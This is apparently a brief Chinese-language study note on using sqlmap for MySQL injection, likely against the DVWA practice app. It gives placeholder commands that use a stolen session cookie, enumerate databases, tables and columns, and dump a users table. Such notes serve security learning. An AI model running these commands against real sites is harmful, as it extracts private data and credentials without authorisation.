SQLMAP学习笔记2 Mysql数据库注入
注入流程
(如果网站需要登录,就要用到cookie信息,通过F12开发者工具获取cookie信息)
sqlmap -u "URL" --cookie="名称=值; 名称=值" --batch #其中-u参数指定目标URL,--batch参数采用默认选项、不进行询问。
结果发现是可注入的
1、sqlmap -u "url" --dbs # 获取数据库;
2、sqlmap -u "url" -D 指定的数据库 --tables --batch #通过-D参数指定为dvwa数据库,--tables参数查看所有的表;
3、sqlmap -u "url" -D 指定的数据库 -T 指定的表 --columns # 通过-T参数指定表为users,--columns查看该表的所有列;
4、sqlmap -u "url" -D 指定的数据库 -T 指定的表 --dump # 直接用--dump参数将所有列的信息都列出来;
see you